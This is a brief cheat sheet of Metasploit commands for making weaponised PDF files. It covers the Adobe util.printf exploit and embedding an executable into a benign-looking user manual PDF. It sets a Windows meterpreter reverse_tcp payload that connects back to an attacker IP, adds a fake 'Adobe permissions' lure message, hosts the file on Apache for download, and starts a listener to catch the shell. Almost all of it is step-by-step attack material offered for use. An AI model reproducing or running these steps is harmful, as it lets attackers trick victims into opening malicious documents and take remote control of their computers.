PDF Exploits 
msfconsole

 
use exploit/windows/fileformat/adobe_utilprintf

 
 FILENAME malicious.pdf   # Default: msf.pdf

 
set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <your_attacker_IP>

 
exploit
•Output file is saved in: /root/.msf4/local/msf.pdf
________________________________________

 
cp /root/.msf4/local/msf.pdf /var/www/html/

File is now accessible at: http://<attacker_IP>/msf.pdf
________________________________________

 
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your_attacker_IP>
set LPORT 4444
exploit

📄 PDF Embedded Executable

msfconsole
 
use exploit/windows/fileformat/adobe_pdf_embedded_exe
 
set INFILENAME /usr/share/set/readme/User_Manual.pdf
 
set PAYLOAD windows/meterpreter/reverse_tcp
 
set LHOST <your_attacker_IP>

set LAUNCH_MESSAGE "This document needs Adobe permissions to continue."

set FILENAME embedded.pdf

exploit
•	File will be saved in /root/.msf4/local/embedded.pdf
 
cp /root/.msf4/local/embedded.pdf /var/www/html/
 
service apache2 start

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your_attacker_IP>
set LPORT 4444
exploit

